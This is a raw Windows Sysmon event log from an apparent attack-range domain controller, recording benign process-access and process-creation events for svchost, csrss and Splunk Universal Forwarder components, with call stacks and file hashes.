13:35:22.746{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:22.746{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:22.746{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:22.746{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:22.746{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E9A-6005-8B00-00000000A301}4644C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:22.746{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E9A-6005-8B00-00000000A301}4644C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:22.746{59A5CD1D-8E9A-6005-8B00-00000000A301}4644C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:23.762{59A5CD1D-8E9B-6005-8C00-00000000A301}48004796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:23.621{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E9B-6005-8C00-00000000A301}4800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:23.621{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:23.621{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:23.621{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:23.621{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:23.621{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:23.621{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:23.621{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:23.621{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:23.621{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:23.621{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E9B-6005-8C00-00000000A301}4800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:23.621{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E9B-6005-8C00-00000000A301}4800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:23.622{59A5CD1D-8E9B-6005-8C00-00000000A301}4800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:24.497{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E9C-6005-8D00-00000000A301}4872C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000003079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:24.497{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:24.497{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:24.497{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:24.497{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
